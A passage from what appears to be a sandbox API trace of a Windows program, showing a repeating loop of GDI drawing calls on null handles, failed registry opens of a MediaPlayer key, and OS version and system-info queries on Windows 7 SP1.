lpRect=0x18179c) returned 0 [0087.697] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.697] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.697] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.698] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x260401d3 [0087.698] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x240401d6 [0087.698] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a02 [0087.698] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a03 [0087.698] CombineRgn (hrgnDst=0x1040a02, hrgnSrc1=0x260401d3, hrgnSrc2=0x240401d6, iMode=1) returned 1 [0087.698] CombineRgn (hrgnDst=0x1040a03, hrgnSrc1=0x260401d3, hrgnSrc2=0x240401d6, iMode=4) returned 2 [0087.698] CreateSolidBrush (color=0xff) returned 0x2100a01 [0087.698] CreateSolidBrush (color=0xff0000) returned 0x1100a04 [0087.698] DeleteObject (ho=0x1100a04) returned 1 [0087.698] DeleteObject (ho=0x240401d6) returned 1 [0087.698] DeleteObject (ho=0x260401d3) returned 1 [0087.698] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.698] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.698] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.698] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.698] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.698] BeginPath (hdc=0x0) returned 0 [0087.698] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.698] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.698] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.698] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.698] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.698] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.698] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.698] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.698] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x250401d6 [0087.698] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x270401d3 [0087.698] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a05 [0087.698] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a06 [0087.698] CombineRgn (hrgnDst=0x1040a05, hrgnSrc1=0x250401d6, hrgnSrc2=0x270401d3, iMode=1) returned 1 [0087.698] CombineRgn (hrgnDst=0x1040a06, hrgnSrc1=0x250401d6, hrgnSrc2=0x270401d3, iMode=4) returned 2 [0087.698] CreateSolidBrush (color=0xff) returned 0x2100a04 [0087.698] CreateSolidBrush (color=0xff0000) returned 0x1100a07 [0087.698] DeleteObject (ho=0x1100a07) returned 1 [0087.698] DeleteObject (ho=0x270401d3) returned 1 [0087.698] DeleteObject (ho=0x250401d6) returned 1 [0087.698] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.698] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.698] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.698] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.698] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.699] BeginPath (hdc=0x0) returned 0 [0087.699] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.699] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.699] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.699] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.699] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.699] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.699] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.699] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.699] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x280401d3 [0087.699] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x260401d6 [0087.699] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a08 [0087.699] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a09 [0087.699] CombineRgn (hrgnDst=0x1040a08, hrgnSrc1=0x280401d3, hrgnSrc2=0x260401d6, iMode=1) returned 1 [0087.699] CombineRgn (hrgnDst=0x1040a09, hrgnSrc1=0x280401d3, hrgnSrc2=0x260401d6, iMode=4) returned 2 [0087.699] CreateSolidBrush (color=0xff) returned 0x2100a07 [0087.699] CreateSolidBrush (color=0xff0000) returned 0x1100a0a [0087.699] DeleteObject (ho=0x1100a0a) returned 1 [0087.699] DeleteObject (ho=0x260401d6) returned 1 [0087.699] DeleteObject (ho=0x280401d3) returned 1 [0087.699] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.699] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.699] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.699] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.699] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.699] BeginPath (hdc=0x0) returned 0 [0087.699] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.699] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.699] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.699] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.699] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.699] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.699] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.699] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.699] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x270401d6 [0087.699] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x290401d3 [0087.699] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a0b [0087.700] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a0c [0087.700] CombineRgn (hrgnDst=0x1040a0b, hrgnSrc1=0x270401d6, hrgnSrc2=0x290401d3, iMode=1) returned 1 [0087.700] CombineRgn (hrgnDst=0x1040a0c, hrgnSrc1=0x270401d6, hrgnSrc2=0x290401d3, iMode=4) returned 2 [0087.700] CreateSolidBrush (color=0xff) returned 0x2100a0a [0087.700] CreateSolidBrush (color=0xff0000) returned 0x1100a0d [0087.700] DeleteObject (ho=0x1100a0d) returned 1 [0087.700] DeleteObject (ho=0x290401d3) returned 1 [0087.700] DeleteObject (ho=0x270401d6) returned 1 [0087.700] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.700] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.700] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.700] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.700] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.700] BeginPath (hdc=0x0) returned 0 [0087.700] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.700] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.700] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.700] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.700] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.700] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.700] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.700] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.700] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2a0401d3 [0087.700] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x280401d6 [0087.700] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a0e [0087.700] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a0f [0087.700] CombineRgn (hrgnDst=0x1040a0e, hrgnSrc1=0x2a0401d3, hrgnSrc2=0x280401d6, iMode=1) returned 1 [0087.700] CombineRgn (hrgnDst=0x1040a0f, hrgnSrc1=0x2a0401d3, hrgnSrc2=0x280401d6, iMode=4) returned 2 [0087.700] CreateSolidBrush (color=0xff) returned 0x2100a0d [0087.700] CreateSolidBrush (color=0xff0000) returned 0x1100a10 [0087.700] DeleteObject (ho=0x1100a10) returned 1 [0087.700] DeleteObject (ho=0x280401d6) returned 1 [0087.700] DeleteObject (ho=0x2a0401d3) returned 1 [0087.700] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.700] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.700] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.700] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.700] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.700] BeginPath (hdc=0x0) returned 0 [0087.701] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.701] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.701] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.701] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.701] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.701] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.701] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.701] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.701] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x290401d6 [0087.701] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2b0401d3 [0087.701] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a11 [0087.701] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a12 [0087.701] CombineRgn (hrgnDst=0x1040a11, hrgnSrc1=0x290401d6, hrgnSrc2=0x2b0401d3, iMode=1) returned 1 [0087.701] CombineRgn (hrgnDst=0x1040a12, hrgnSrc1=0x290401d6, hrgnSrc2=0x2b0401d3, iMode=4) returned 2 [0087.701] CreateSolidBrush (color=0xff) returned 0x2100a10 [0087.701] CreateSolidBrush (color=0xff0000) returned 0x1100a13 [0087.701] DeleteObject (ho=0x1100a13) returned 1 [0087.701] DeleteObject (ho=0x2b0401d3) returned 1 [0087.701] DeleteObject (ho=0x290401d6) returned 1 [0087.701] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.701] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.701] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.701] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.701] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.701] BeginPath (hdc=0x0) returned 0 [0087.701] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.701] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.701] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.701] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.701] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.701] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.701] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.701] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.701] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2c0401d3 [0087.701] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2a0401d6 [0087.701] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a14 [0087.701] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a15 [0087.702] CombineRgn (hrgnDst=0x1040a14, hrgnSrc1=0x2c0401d3, hrgnSrc2=0x2a0401d6, iMode=1) returned 1 [0087.702] CombineRgn (hrgnDst=0x1040a15, hrgnSrc1=0x2c0401d3, hrgnSrc2=0x2a0401d6, iMode=4) returned 2 [0087.702] CreateSolidBrush (color=0xff) returned 0x2100a13 [0087.702] CreateSolidBrush (color=0xff0000) returned 0x1100a16 [0087.702] DeleteObject (ho=0x1100a16) returned 1 [0087.702] DeleteObject (ho=0x2a0401d6) returned 1 [0087.702] DeleteObject (ho=0x2c0401d3) returned 1 [0087.702] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.702] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.702] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.702] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.702] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.702] BeginPath (hdc=0x0) returned 0 [0087.702] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.702] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.702] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.702] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.702] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.702] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.702] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.702] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.702] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2b0401d6 [0087.702] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2d0401d3 [0087.702] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a17 [0087.702] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a18 [0087.702] CombineRgn (hrgnDst=0x1040a17, hrgnSrc1=0x2b0401d6, hrgnSrc2=0x2d0401d3, iMode=1) returned 1 [0087.702] CombineRgn (hrgnDst=0x1040a18, hrgnSrc1=0x2b0401d6, hrgnSrc2=0x2d0401d3, iMode=4) returned 2 [0087.702] CreateSolidBrush (color=0xff) returned 0x2100a16 [0087.702] CreateSolidBrush (color=0xff0000) returned 0x1100a19 [0087.702] DeleteObject (ho=0x1100a19) returned 1 [0087.702] DeleteObject (ho=0x2d0401d3) returned 1 [0087.702] DeleteObject (ho=0x2b0401d6) returned 1 [0087.702] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.702] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.702] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.702] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.702] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.702] BeginPath (hdc=0x0) returned 0 [0087.702] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.702] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.702] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.702] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.702] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.702] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.703] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.703] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.703] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2e0401d3 [0087.703] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2c0401d6 [0087.703] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a1a [0087.703] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a1b [0087.703] CombineRgn (hrgnDst=0x1040a1a, hrgnSrc1=0x2e0401d3, hrgnSrc2=0x2c0401d6, iMode=1) returned 1 [0087.703] CombineRgn (hrgnDst=0x1040a1b, hrgnSrc1=0x2e0401d3, hrgnSrc2=0x2c0401d6, iMode=4) returned 2 [0087.703] CreateSolidBrush (color=0xff) returned 0x2100a19 [0087.703] CreateSolidBrush (color=0xff0000) returned 0x1100a1c [0087.703] DeleteObject (ho=0x1100a1c) returned 1 [0087.703] DeleteObject (ho=0x2c0401d6) returned 1 [0087.703] DeleteObject (ho=0x2e0401d3) returned 1 [0087.703] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.703] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.703] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.703] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.703] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.703] BeginPath (hdc=0x0) returned 0 [0087.703] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.703] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.703] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.703] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.703] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.703] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.703] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.703] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.703] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x2d0401d6 [0087.703] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x2f0401d3 [0087.703] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a1d [0087.703] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040a1e [0087.703] CombineRgn (hrgnDst=0x1040a1d, hrgnSrc1=0x2d0401d6, hrgnSrc2=0x2f0401d3, iMode=1) returned 1 [0087.703] CombineRgn (hrgnDst=0x1040a1e, 